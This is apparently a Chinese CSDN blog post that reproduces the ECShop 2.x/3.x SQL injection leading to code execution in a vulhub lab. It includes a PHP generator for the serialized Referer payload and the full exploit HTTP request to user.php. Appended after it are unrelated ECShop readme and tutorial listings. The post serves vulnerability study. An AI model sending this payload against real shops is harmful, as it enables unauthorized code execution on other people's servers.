ECShop

ECShop 2.x/3.x SQL注入/任意代码执行漏洞

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

具体原理参照 http://ringk3y.com/2018/08/31/ecshop2-x代码执行/
                      https://xz.aliyun.com/t/2725

复现:
安装完ecshop程序后,运行p牛的脚本生成poc

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

在这里插入图片描述
向存在漏洞的接口发送如下数据包

GET /user.php?act=login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

2.x
在这里插入图片描述
3.x
在这里插入图片描述

相关推荐
ECSHOP 通用电子商务平台 ---------------------------------------------------------------------- ECSHOP是一款开源免费的通用电子商务平台构建软件,使用她您可以非常方便的开一个网上商店,在网上开展自己的生意。ECSHOP有如下特点: 1、强大的模版机制 做网站的,做页面是一个头疼的问题。如果每次的小改动都要去改页面模版代码再上传的话,作为商家的你,一定不厌其烦。 ECSHOP 结合最流行的 Adobe Dreamweaver 软件实现了一套模版机制,让您改动模版不再需要上传,而是在后台稍稍动动手设置一下就可以了。 2、完全开放的插件机制 支付、配送,这个是商家每天都要面对的功能,如果您现在使用的程序不够开放,那么在您想快速变更所用的支付、配送体系的时候,很可能会拖了后腿。 我们根据自己的长期运营和开发经验,总结出了一套开放、简洁的插件体系,以支持不断变化的支付、配送体系的变更。 届时,您会发现,这块事情将会解除您的忧愁,可以把精力集中在更重要的事情上。 我们同时也以插件形式支持会员整合。迁入、迁出,不再烦恼。 3、功能的 AJAX 化 当您发现编辑一个商品,需要敲打键盘、挪动鼠标几十下的时候,您是否想到了以后大批量修改的是一个非常恐怖的工作呢? ECSHOP 使用目前流行的 AJAX 技术,为您实现简洁修改,奠定了基础。 同时在更多方面以减轻用户的劳动,提供工作的效率为宗旨,完整的实现了相关功能的 AJAX 化,由于是在底层完全支持,所以也为以后的扩展打下了基础。 4、促销功能 当您把商品一一上架、却发现没有用户来关心,同样是一个头疼的问题。 那么我们目前在提供了积分、红包、赠品等常规促销手段,更根据自身的电商经验,独家加入了更容易吸引人气的夺宝奇兵促销功能。 把您每月做广告的费用拿出来一点点,变成您所卖的商品,通过夺宝奇兵活动吸引人气、回馈用户,我相信是一个比简单的广而告之更有效的办法。 5、高效率的代码和执行性能 当你浏览自己的网站,发现速度很慢,是不是恨的要全部改成静态页面呢? 其实不然,根据我们长时间的开发经验,动态、静态页面在不同的用途下各擅胜场,但是在有很多个性化功能的前提下,动态的页面要比纯静态的页面好处多多,如果动态页面的 URL 静态化可以通过 REWRITE 方式实现,那么剩下就是一个效率问题。 我们也认为,动态页面的瓶颈99%在数据库上,我们通过以往自己的数据库架构设计以及优化经验为基础,设计了目前的 ECSHOP 数据库结构,并通过缓存机制,实现目前的高效访问。 在不考虑网速的情况下,与纯静态页面相比,您不会感觉到丝毫的差别。我们也会在以后的开发设计中,让目前的架构更加完善、更加高效。 6、常规功能的更完善实现 有些软件的功能虽然不错,但是因为对于用户不够友善,也会让人敬而远之,也往往把客户拒之门外,我们希望能够在常规的功能上,也能为您和您的客户提供更好的用户体验。 7、代码的开源和免费的发展策略 我们认为开源是一个趋势,同时也是一个商业模式。我们也同样认为免费是一个趋势,同时也是一个商业模式。 我们不是说我们不想收费,而是希望在用户能够在提高自身收入和价值的同时,能够让我们之间形成一个双赢的结局。 我们认为的收费应该是以周边服务收费,而不是卖产品本身,所以在这之前我们与广泛的业界同仁进行过充分的交流,对自身是否可以实现这个想法也有一定的考证。 为了您更好的使用ECSHOP,请阅读docs目录下面的相应文档,如果这些文档无法满足您的需要,您可以访问我们的网站获得支持: 1. 官方网站:http://www.ecshop.com 2. 讨论社区:http://bbs.ecshop.com 非常感谢您在众多的软件中选择了ECShop。相信她会帮助您的事业蒸蒸日上。 (C) 2005 - 2008 上海商派网络科技有限公司
前言 3 一、商圈和地区进行关联 4 二、其他页面显示购买记录的函数 5 三、多货币解决方案 6 四、仿淘宝商品详细页实现尺码颜色关联显示库存 12 五、仿淘宝商品详细页加入购物车效果 14 六、ecshop加入购物车效果(各个页面) 22 七、商品列表页面“喜欢“ 功能实现 29 八、商品列表也显示获赠消费积分 32 九、分析 ecshop 里的$GLOBALS 37 十、解决 选择属性 直接就是属性价格不需要在原价基础上加价 38 十一、商品详细页下载商品介绍相关图片 39 十二、实现后台二次开发后功能模块仍然可以分配权限 41 十三、ecshop调用bbs数据 42 十四、整理了一个 获取用户等级的函数 43 十五、商品页显示具体属性排序 44 十六、解决ecshop新建页面分页问题 49 十七、刚修改的伪静态分类URL 52 十八、ecshop批发销售 66 十九、网银支付直通插件 实现方法 69 二十、商品列表页多图切换的实现 75 二十一、完善论坛发布的qq登录插件 77 二十二、倒计时代码 78 二十三、关于ecshop回调函数应用 83 二十四、商品内容页加订单留言功能分析 84 二十五、有关商品详细页是常规显示还是显示宣传页的实现方法 85 二十六、后台添加搜索功能讲解 87 二十七、分享ec搜索出现相关商品的效果滑动效果(模仿百度) 88 二十八、修改注册发送邮件(更新) 94 二十九、新增加一调用编辑器函数 97 三十、简单实现 各个页面都可显示友情链接 97 三十一、Ecshop系统框架分析 99 三十二、二次开发技术共享 后台邮件群发共享 100 三十三、ecshop内页调用友情链接 100 三十四、项目要求在后台商品分类添加图片的功能。 102 三十五、分类按照拼音第一字母排序显示实现 102 三十六、获取分类的一级分类和二级分类 106 三十七、如何调用解决列表的购买数量 107 三十八、详情页调评论次数 108 三十九、关于购买数量 订单数量 109 四十、Ecshop ajax应用讨论 109 四十一、调用当前分类或当前分类的下级分类函数 115 四十二、在商品列表显示购买记录 118 四十三、ajax更新购物车数量 118 四十四、PHP导出excle数据 123 四十五、页面多倒计时显示最新修改 125 四十六、关于lbi文件控制原理分析 129 四十七、页面浏览历史图片调用分析 130
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页